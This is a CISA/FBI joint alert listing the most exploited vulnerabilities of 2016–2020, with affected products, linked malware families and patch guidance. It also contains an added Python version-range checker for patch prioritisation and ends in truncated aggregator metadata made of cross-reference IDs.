### Summary
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals at public and private sector organizations to place an increased priority on patching the most commonly known vulnerabilities exploited by sophisticated foreign cyber actors.
This alert provides details on vulnerabilities routinely exploited by foreign cyber actors—primarily Common Vulnerabilities and Exposures (CVEs)[[1]](<https://cve.mitre.org/cve/>)—to help organizations reduce the risk of these foreign threats.
Foreign cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available.
The public and private sectors could degrade some foreign cyber threats to U.S. interests through an increased effort to patch their systems and implement programs to keep system patching up to date. A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries’ operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.
For indicators of compromise (IOCs) and additional guidance associated with the CVEs in this Alert, see each entry within the Mitigations section below.
### Technical Details
## Top 10 Most Exploited Vulnerabilities 2016–2019
U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.
* According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. After OLE the second-most-reported vulnerable technology was a widespread Web framework known as Apache Struts.
* Of the top 10, the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158. All three of these vulnerabilities are related to Microsoft’s OLE technology.
* As of December 2019, Chinese state cyber actors were frequently exploiting the same vulnerability—CVE-2012-0158—that the U.S. Government publicly assessed in 2015 was the most used in their cyber operations.[[2]](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) This trend suggests that organizations have not yet widely implemented patches for this vulnerability and that Chinese state cyber actors may continue to incorporate dated flaws into their operational tradecraft as long as they remain effective.
* Deploying patches often requires IT security professionals to balance the need to mitigate vulnerabilities with the need for keeping systems running and ensuring installed patches are compatible with other software. This can require a significant investment of effort, particularly when mitigating multiple flaws at the same time.
* A U.S. industry study released in early 2019 similarly discovered that the flaws malicious cyber actors exploited the most consistently were in Microsoft and Adobe Flash products, probably because of the widespread use of these technologies.[[3]](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) Four of the industry study’s top 10 most exploited flaws also appear on this Alert’s list, highlighting how U.S. Government and private-sector data sources may complement each other to enhance security.
## Vulnerabilities Exploited in 2020
In addition to the top 10 vulnerabilities from 2016 to 2019 listed above, the U.S. Government has reported that the following vulnerabilities are being routinely exploited by sophisticated foreign cyber actors in 2020:
* Malicious cyber actors are increasingly targeting unpatched Virtual Private Network (VPN) vulnerabilities.
* An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild.
* An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors.
* March 2020 brought an abrupt shift to work-from-home that necessitated, for many organizations, rapid deployment of cloud collaboration services, such as Microsoft Office 365 (O365). Malicious cyber actors are targeting organizations whose hasty deployment of Microsoft O365 may have led to oversights in security configurations and left them vulnerable to attack.
* Cybersecurity weaknesses—such as poor employee education on social engineering attacks and a lack of system recovery and contingency plans—have continued to make organizations susceptible to ransomware attacks in 2020.
### Mitigations
This Alert provides mitigations for each of the top vulnerabilities identified above. In addition to the mitigations listed below, CISA, FBI, and the broader U.S. Government recommend that organizations transition away from any end-of-life software.
## Mitigations for the Top 10 Most Exploited Vulnerabilities 2016–2019
**Note:** The list of associated malware for each CVE below is not meant to be exhaustive; it identifies a malware family commonly associated with exploiting the CVE.
_**CVE-2017-11882**_
* Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products
* Associated Malware: Loki, FormBook, Pony/FAREIT
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882>
* IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>
_**CVE-2017-0199**_
* Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
* Associated Malware: FINSPY, LATENTBOT, Dridex
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199>
* IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>
_**CVE-2017-5638**_
* Vulnerable Products: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1
* Associated Malware: JexBoss
* Mitigation: Upgrade to Struts 2.3.32 or Struts 2.5.10.1
* More Detail:
  * <https://www.us-cert.gov/ncas/analysis-reports/AR18-312A>
  * <https://nvd.nist.gov/vuln/detail/CVE-2017-5638>
_**CVE-2012-0158**_
* Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0
* Associated Malware: Dridex
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail:
  * <https://www.us-cert.gov/ncas/alerts/aa19-339a>
  * <https://nvd.nist.gov/vuln/detail/CVE-2012-0158>
* IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>
_**CVE-2019-0604**_
* Vulnerable Products: Microsoft SharePoint
* Associated Malware: China Chopper
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2019-0604>
_**CVE-2017-0143**_
* Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016
* Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0143>
_**CVE-2018-4878**_
* Vulnerable Products: Adobe Flash Player before 28.0.0.161
* Associated Malware: DOGCALL
* Mitigation: Update Adobe Flash Player installation to the latest version
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-4878>
* IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d>
**_CVE-2017-8759_**
* Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7
* Associated Malware: FINSPY, FinFisher, WingBird
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-8759>
* IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>
_**CVE-2015-1641**_
* Vulnerable Products: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1
* Associated Malware: Toshliph, UWarrior
* Mitigation: Update affected Microsoft products with the latest security patches
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2015-1641>
* IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133m>
_**CVE-2018-7600**_
* Vulnerable Products: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1
* Associated Malware: Kitty
* Mitigation: Upgrade to the most recent version of Drupal 7 or 8 core.
* More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-7600>
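The version ranges above are the input a patch-management team actually needs to act on. The following is an added example (not CISA's or any vendor's code) that transcribes the ranges the Alert gives for the three products with dotted version numbers (Apache Struts 2 / CVE-2017-5638, Adobe Flash Player / CVE-2018-4878, Drupal / CVE-2018-7600) and flags inventory entries that fall inside them; the inventory at the bottom is constructed sample data and the product names are assumed labels.

```python
"""Patch-priority check against the affected-version ranges this Alert lists.

Added example, not CISA's or any vendor's code. It transcribes the version
ranges the Alert gives for the three products with dotted version numbers
(Apache Struts 2 / CVE-2017-5638, Adobe Flash Player / CVE-2018-4878,
Drupal / CVE-2018-7600) and flags inventory entries that fall inside them.
The inventory at the bottom is constructed sample data.
"""
from dataclasses import dataclass
from typing import Optional


def parse_version(text: str) -> tuple:
    """'2.5.10.1' -> (2, 5, 10, 1). Stops at the first non-numeric piece."""
    parts = []
    for piece in text.strip().split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(parts)


@dataclass(frozen=True)
class AffectedRange:
    cve: str
    product: str             # assumed inventory label, not a vendor identifier
    branch: Optional[tuple]  # (8, 4) for "8.4.x"; None means every branch
    fixed_in: tuple          # first version on that branch that is patched
    mitigation: str

    def matches(self, version: tuple) -> bool:
        # Tuple comparison gives numeric ordering, and a shorter tuple sorts
        # before its extension, so 2.5.10 < 2.5.10.1 as the Alert intends.
        if self.branch is not None and version[: len(self.branch)] != self.branch:
            return False
        return version < self.fixed_in


STRUTS_FIX = "Upgrade to Struts 2.3.32 or Struts 2.5.10.1"
DRUPAL_FIX = "Upgrade to the most recent version of Drupal 7 or 8 core"
FLASH_FIX = "Update Adobe Flash Player installation to the latest version"

# Transcribed from the Alert's "Vulnerable Products" lines.
AFFECTED = (
    AffectedRange("CVE-2017-5638", "apache-struts", (2, 3), (2, 3, 32), STRUTS_FIX),
    AffectedRange("CVE-2017-5638", "apache-struts", (2, 5), (2, 5, 10, 1), STRUTS_FIX),
    AffectedRange("CVE-2018-4878", "adobe-flash-player", None, (28, 0, 0, 161), FLASH_FIX),
    AffectedRange("CVE-2018-7600", "drupal", (7,), (7, 58), DRUPAL_FIX),
    # "8.x before 8.3.9" covers 8.0 through 8.3; 8.4.x and 8.5.x have their own lines.
    AffectedRange("CVE-2018-7600", "drupal", (8,), (8, 3, 9), DRUPAL_FIX),
    AffectedRange("CVE-2018-7600", "drupal", (8, 4), (8, 4, 6), DRUPAL_FIX),
    AffectedRange("CVE-2018-7600", "drupal", (8, 5), (8, 5, 1), DRUPAL_FIX),
)


def exposures(product: str, version_text: str) -> list:
    """CVEs from the Alert that apply to this product/version, sorted and deduplicated."""
    version = parse_version(version_text)
    hits = {r.cve for r in AFFECTED if r.product == product and r.matches(version)}
    return sorted(hits)


def check_inventory(inventory) -> list:
    """Return (host, product, version, cve, mitigation) tuples for exposed hosts."""
    findings = []
    for host, product, version_text in inventory:
        for cve in exposures(product, version_text):
            fix = next(r.mitigation for r in AFFECTED if r.cve == cve)
            findings.append((host, product, version_text, cve, fix))
    return findings


# Constructed sample inventory: (hostname, product, installed version).
SAMPLE_INVENTORY = [
    ("web-01", "apache-struts", "2.5.10"),
    ("web-02", "apache-struts", "2.5.10.1"),
    ("cms-01", "drupal", "8.4.5"),
    ("cms-02", "drupal", "8.6.0"),
    ("kiosk-07", "adobe-flash-player", "28.0.0.137"),
]

if __name__ == "__main__":
    for host, product, version, cve, fix in check_inventory(SAMPLE_INVENTORY):
        print(f"{host}: {product} {version} is affected by {cve}; {fix}")
```

The boundary cases matter: 2.5.10.1, 2.3.32, 8.4.6 and 28.0.0.161 are the first patched builds and are reported clean, while 2.5.10, 8.4.5 and 28.0.0.137 are flagged.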
## Mitigations for Vulnerabilities Exploited in 2020
**_CVE-2019-11510_**
* Vulnerable Products: Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15 and Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15
* Mitigation: Update affected Pulse Secure devices with the latest security patches.
* More Detail:
  * <https://www.us-cert.gov/ncas/alerts/aa20-107a>
  * <https://nvd.nist.gov/vuln/detail/CVE-2019-11510>
  * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>
_**CVE-2019-19781**_
* Vulnerable Products: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SDWAN WANOP
* Mitigation: Update affected Citrix devices with the latest security patches
* More Detail:
  * <https://www.us-cert.gov/ncas/alerts/aa20-020a>
  * <https://www.us-cert.gov/ncas/alerts/aa20-031a>
  * <https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html>
  * <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
  * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>
_**Oversights in Microsoft O365 Security Configurations**_
* Vulnerable Products: Microsoft O365
* Mitigation: Follow Microsoft O365 security recommendations
* More Detail: <https://www.us-cert.gov/ncas/alerts/aa20-120a>
**_Organizational Cybersecurity Weaknesses_**
* Vulnerable Products: Systems, networks, and data
* Mitigation: Follow cybersecurity best practices
* More Detail: <https://www.cisa.gov/cyber-essentials>
## CISA’s Free Cybersecurity Services
Adversaries use known vulnerabilities and phishing attacks to compromise the security of organizations. CISA offers several free scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors.
**Cyber Hygiene: Vulnerability Scanning** helps secure your internet-facing systems from weak configuration and known vulnerabilities. It also encourages organizations to adopt modern security best practices. CISA performs regular network and vulnerability scans and delivers a weekly report for your action. Once initiated, this service is mostly automated and requires little direct interaction. After CISA receives the required paperwork for Cyber Hygiene, our scans will start within 72 hours and you’ll begin receiving reports within two weeks.
**Web Application Service** checks your publicly accessible web sites for potential bugs and weak configurations. It provides a “snapshot” of your publicly accessible web applications and also checks functionality and performance in your application.
If your organization would like these services or want more information about other useful services, please email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).
## CISA Online Resources
The Patch Factory: CISA infographic depicting the global infrastructure for managing vulnerabilities.
[CISA Alert: (AA20-120A) Microsoft Office 365 Security Recommendations](<https://www.us-cert.gov/ncas/alerts/aa20-120a>): recommendations for organizations to review and ensure their O365 environment is configured to protect, detect, and respond against would-be attackers.
[CISA’s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>): a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.
### Contact Information
If you have any further questions related to this Joint Alert, please contact the FBI at either your local Cyber Task Force or FBI CyWatch.
* You can find your local field offices at <https://www.fbi.gov/contact-us/field>
* CyWatch can be contacted through e-mail at [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>) or by phone at 1-855-292-3937
To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> "Email CISA Central" ).
### References
[[1] Cybersecurity Vulnerabilities and Exposures (CVE) list](<https://cve.mitre.org/cve/>)
[[2] CISA Alert (TA15-119A). Top 30 Targeted High Risk Vulnerabilities. (2016, September 29)](<https://www.us-cert.gov/ncas/alerts/TA15-119A>)
[[3] Recorded Future. 2019 Vulnerability Report: Cybercriminals Continue to Target Microsoft Products. (2020, February 4)](<https://www.recordedfuture.com/top-vulnerabilities-2019/>)
### Revisions
May 12, 2020: Initial Version
"https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "immutableFields": [], "lastseen": "2023-09-23T07:41:19", "viewCount": 7, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "adobe", "idList": ["APSA18-01", "APSB18-03"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:41DF47B0-8F5D-477F-9F42-AB76A33252AD", "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "AKB:66FA01AC-CBAA-4917-AF21-8896B661A3F4", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:6CA719CE-A47A-414E-8DBA-FFE14F20C0FF", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", 
"AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS12_027", "MS17_010", "NETSCALER_TRAVERSAL_RCE", "OFFICE_WSDL", "STRUTS_OGNL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "CARBONBLACK:B16171F3AA4A3A162027FA8750C9D202", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:101048", "VU:421280", "VU:619785", "VU:834067", "VU:921560", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-129", "CPAI-2012-130", "CPAI-2012-131", "CPAI-2012-132", "CPAI-2012-133", "CPAI-2014-1384", "CPAI-2015-0444", "CPAI-2017-0177", "CPAI-2017-0197", "CPAI-2017-0251", "CPAI-2017-0676", "CPAI-2017-0750", "CPAI-2017-1009", "CPAI-2018-0052", "CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-1097", "CPAI-2019-1653"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8809AF4B96861275A43448FB64E686D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0158", "CISA-KEV-CVE-2015-1641", "CISA-KEV-CVE-2017-0143", "CISA-KEV-CVE-2017-0199", "CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2017-5638", "CISA-KEV-CVE-2017-8759", "CISA-KEV-CVE-2018-4878", "CISA-KEV-CVE-2018-7600", "CISA-KEV-CVE-2019-0604", 
"CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cnvd", "idList": ["CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-11884", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0594", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:426F0", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814", "DEBIAN:DSA-4156-1:CE193"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639", "E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934", "EDB-ID:42711", "EDB-ID:43163", "EDB-ID:44263", "EDB-ID:44412", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:44744", "EDB-ID:44745", "EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:3AE76F8EB91746556D3EB11E9FF64F66", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:6891CF27FFF72B8EB68CEFB56D149FC3", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "EXPLOITPACK:BF5C8288A392CBC3E7947C012FB8E11E", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", 
"EXPLOITPACK:E563140BD918794B55F61FC55941120F"]}, {"type": "f5", "idList": ["F5:K22854260", "F5:K43451236", "F5:K57181937"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01"]}, {"type": "fireeye", "idList": ["FIREEYE:0D4F2E1284C786ABA6A50D8BE7E34E6E", "FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:2648D8DF405C49929956ACCF89B47ABF", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:338F0E4516B790140B04DBFA18EAAC20", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:38120E3D3979DCD57297419690545DDD", "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", 
"FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69"]}, {"type": "fortinet", "idList": ["FG-IR-22-398"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31", "756A8631-0B84-11E8-A986-6451062F0F7A", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "gentoo", "idList": ["GLSA-201803-08"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:C82C4FE9D1A6B81D79D6EF10C4F9D007"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "059DC199-E425-50EE-B5F5-E351E0323E69", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A03C474-5159-5D12-82D2-E28FA42B84BB", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "2A80D982-2C57-5BA2-86CB-6169F3859086", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "31DB22CD-3492-524F-9D26-035FC1086A71", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "38A11E23-686C-5C12-93FA-4A82D0E04202", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3AFE745D-D706-5B84-B2C7-205590936BBF", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "58F1E19B-12E9-5FE1-90C6-14688FEE3C8C", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", 
